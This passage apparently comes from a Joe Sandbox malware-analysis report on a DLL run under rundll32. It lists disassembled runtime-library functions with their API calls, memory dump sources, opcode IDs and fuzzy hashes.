                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 3523768491-393685449
                                                                                                                                                                                                                                                  • Opcode ID: bda6544fe4ae76e9c966046574d2ab8aba2e0a6057aceda30bee322fd5c5b1c4
                                                                                                                                                                                                                                                  • Instruction ID: f316bf09ab0905bbfcd6d3bf85c0ee5a6f9e6efb4081dae354aa448471526a42
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bda6544fe4ae76e9c966046574d2ab8aba2e0a6057aceda30bee322fd5c5b1c4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8E1AE725047888AE7A2DF78D4803ED7BA1F759788F148226FF8957696CF34C689CB01
                                                                                                                                                                                                                                                  Function 0000000180041908 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 0000000180041917
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004194D
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004197A
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004198B
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004199C
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 00000001800419B7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                                  • Opcode ID: 06c95a4aa1771613fd3935f9b6fa3d2226365f91a529870d9feca7c030eab943
                                                                                                                                                                                                                                                  • Instruction ID: a236a635390231764599b441ca33359ecfb18b4257108ec610f8a3aa5a970b1f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06c95a4aa1771613fd3935f9b6fa3d2226365f91a529870d9feca7c030eab943
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01118E30204E4846F6D6632155A53FD5242BB4C7F9F15C724F876177C6EE288B095749
                                                                                                                                                                                                                                                  Function 0000000180016F68 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                                                                  • API String ID: 2943138195-757766384
                                                                                                                                                                                                                                                  • Opcode ID: 037b52de5d520ae03becac24376554bd3a1233cb3c82c6952893d7c61cf1fdce
                                                                                                                                                                                                                                                  • Instruction ID: 4038f050409aa154ac6b01109c2d1ae91dabd18faee6e66f8a741a0bb842cd02
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 037b52de5d520ae03becac24376554bd3a1233cb3c82c6952893d7c61cf1fdce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2716A76701B4898EB968F68D8503EC66B5B30D7C4F94C529FA5907BA6DF39C3A8C340
                                                                                                                                                                                                                                                  Function 0000000180018CB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 89COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::
                                                                                                                                                                                                                                                  • String ID: `template-parameter$void
                                                                                                                                                                                                                                                  • API String ID: 1333004437-4057429177
                                                                                                                                                                                                                                                  • Opcode ID: 0be1fb5e2f1216bc1b940a859d571dac6121c46e0836de7767b4ce6883e4aeb3
                                                                                                                                                                                                                                                  • Instruction ID: 6b3cef5dec8401bd2ebba64d188ad0518e1c0495917126e62d011a98b4116422
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0be1fb5e2f1216bc1b940a859d571dac6121c46e0836de7767b4ce6883e4aeb3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5414D32700F5888FB92CBA4E8513ED2371BB5C7C8F959125EE092BB95DF78864AC340
                                                                                                                                                                                                                                                  Function 000000018000F874 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: 220969f90f81ea5a491faac75346ba19894adf6be773f5f6384549e35cdde0f7
                                                                                                                                                                                                                                                  • Instruction ID: 5e4ab2c16c99f6d0b16bc80479f9834d0d63f7ea8ea22c137d887cbb2cd0e6bc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 220969f90f81ea5a491faac75346ba19894adf6be773f5f6384549e35cdde0f7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0217131212A0591EEA6CB56A4007B97294BB4CBF0F59C735BE2957BD5EF38CA499300
                                                                                                                                                                                                                                                  Function 000000018000FABC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: a289e550c52b847aac57570cc03b00b5a0ebd41078ac3d3d573d834e8681df30
                                                                                                                                                                                                                                                  • Instruction ID: a95981d2bde028957cb7d6165ac678c66b686b579846189090f2e31615455093
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a289e550c52b847aac57570cc03b00b5a0ebd41078ac3d3d573d834e8681df30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7218E32215B4881EAA6DB5694103B533A4EB8CFF0F5C9335AE2987BD0DF38C6098740
                                                                                                                                                                                                                                                  Function 000000018003FF44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                  • Opcode ID: 30848afdadcb297948af538131b5f5178555a04d7eb4f77c05f8b310286a30c0
                                                                                                                                                                                                                                                  • Instruction ID: c7829849b2f168159db765faf0b81d1f3368c8563c0f8ad31c6079f03d2a3549
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30848afdadcb297948af538131b5f5178555a04d7eb4f77c05f8b310286a30c0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24F06271211B0881EBA28B24E8443BB6360AB4D7E1F648725FA69463E4CF6EC24D8700
                                                                                                                                                                                                                                                  Function 0000000180007930 Relevance: 7.8, APIs: 5, Instructions: 326threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                                                                                                                                  • Opcode ID: 22161daed3c2e48cfb6a2128a24651a7aeaf3e7c08b61552abfb125deb73946f
                                                                                                                                                                                                                                                  • Instruction ID: 3c6318098b6a105b45b44d24200d3ea19cec9be78bcf65ec60f6a028176840a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22161daed3c2e48cfb6a2128a24651a7aeaf3e7c08b61552abfb125deb73946f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2602CB32619B8486E7A1CB55E4947AAB7B0F3D8794F108016FACE47BA9DF7DC548CB00
                                                                                                                                                                                                                                                  Function 000000018000C1F8 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                                                                                  • Opcode ID: b7f25e227ec73591775f402b439beda8c2004b6fb1d37a0a7765b10afffff269
                                                                                                                                                                                                                                                  • Instruction ID: 135fc376b1a8cfedf6fd7dae04e6b903f416e55d44e7b02af783c7e71b4be7be
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7f25e227ec73591775f402b439beda8c2004b6fb1d37a0a7765b10afffff269
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26B19332216A4881EAE7DB559480BFD77A0EB5CBC4F09C426BE4A47785DF38C74AC742
                                                                                                                                                                                                                                                  Function 00000001800152B4 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::$Name::operator+
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 826178784-0
                                                                                                                                                                                                                                                  • Opcode ID: 157e1aa60b488d9254f56a5c3751a730c19624724a7ec1fbf038d5f98596ec9c
                                                                                                                                                                                                                                                  • Instruction ID: dc3e5c478041bf289d860fee317c83415d36c744b4e48cd64d64fa13d1e4a70b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 157e1aa60b488d9254f56a5c3751a730c19624724a7ec1fbf038d5f98596ec9c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77416B36201E58D8EB92CB61E8903EC37B4B719BC5FA48016EAA95B395DF75C759C300
                                                                                                                                                                                                                                                  Function 00000001800419D0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 00000001800419EF
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A0E
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A36
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A47
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A58
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                  • Opcode ID: 157056b5f07e6d5b21f7a52ee4ede94ab6a34c5cf7ed9480ed3c8b7af57ff7d6
                                                                                                                                                                                                                                                  • Instruction ID: e93ad22c6cc443ae94773b33ba4779df2cc7973ffbf2f88c150105d93498b686
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 157056b5f07e6d5b21f7a52ee4ede94ab6a34c5cf7ed9480ed3c8b7af57ff7d6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00118E30205E4845FADA672195D63FD22417B4C7F9F0AC724B83A066D6EE28CB29574A
                                                                                                                                                                                                                                                  Function 0000000180041520 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                  • Opcode ID: 9832f5b7719f7b86fd8c38624eed4aee1a7210bb3eeaaf95e05a674a0a924b3e
                                                                                                                                                                                                                                                  • Instruction ID: 894476b8d09a22a5dbe3d770f39793525e4cc36c43d7413f8e4abc8b3aeea73a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9832f5b7719f7b86fd8c38624eed4aee1a7210bb3eeaaf95e05a674a0a924b3e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1115470314E0985FADAA73554E27FD12816B8C7F9F19CB24B936062C6ED38CB486749
                                                                                                                                                                                                                                                  Function 0000000180041864 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
